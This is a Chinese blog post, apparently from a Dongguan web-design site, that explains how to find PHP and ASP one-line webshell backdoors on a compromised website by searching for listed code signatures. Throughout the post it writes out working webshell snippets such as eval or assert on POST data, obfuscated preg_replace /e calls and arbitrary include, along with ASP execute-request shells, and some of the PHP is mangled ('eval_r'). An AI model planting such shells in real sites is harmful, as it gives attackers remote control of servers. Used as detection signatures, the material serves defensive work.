东莞长安哪里淘宝培训

很多人网站很久之前就被挂马,如何快速找出木马并删掉后门呢?

很多人网站很久之前就被挂马,如何快速找出木马并删掉后门呢?很多人一个个的目录去查找,那个真的是小白做法,其实对于PHP一句话木马后门这些事可以通过关键字查杀的。不要觉着我没事研究这个做什么!其实就是告诉你搜索这些代码,如果搜索到了,说明恭喜你,你网站中招了!如何知道开发程序的人有不有在你网站留后门,搜索下这些代码就知道啦!

1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

2、

$filename=$_GET['xbid'];

include ($filename);

//危险的include函数,直接编译任何文件为php格式运行


3、

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

5、include ($uid);

//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话

6、典型一句话

程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST[c]);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
 
php木马如何查找:

历史回顾:

ver 1.0 <?PHP eval($_POST[w]);?>

ver 1.1 <?PHP @eval($_POST[w]);?>

ver 1.2 <?PHP eval(@base64_decode($_POST[w]));?>

ver 2.0 <?PHP include ‘xxoo.jpg’ ;?>

ver 2.0.1 <?PHP require_once ‘xxoo.jpg’ ;?>

ver 2.0.* <?PHP ****** ‘xxoo.jpg’ ;?>

ver 3.0 <?PHP @$_POST[f]($_POST[w]);?>

ver 3.0.* <?PHP $a=@$_POST[f];$b=$_POST[w];……..?>

ver *.* <?PHP /*UNKNOWN*/?>

有不明白的联系我啦!如果你网站是ASP,那么就搜索如下代码:代码:
ASP一句话木马
<%execute request("value")%>
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
如果发现上述代码,就说明你的网站已经被别人控制了。尽快的解决问题吧。

分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
前一篇:discuz!X2.0论坛漏洞被注入木马怎么设置才真正安全?discuz!X2.0论坛目录权限 后一篇:最近几天很多公司有dede程序网站总是被挂马,如何防止被挂马?
标签:网站木马查找网站后门查找方法
分类:东莞网站设计与美工荟萃| 发布:admin| 查看: | 发表时间:2013-11-8
原创文章如转载,请注明:转载自东莞电子商务 http://www.gdhaoyou.com/
本文链接:http://www.gdhaoyou.com/post/hackhm.html

相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。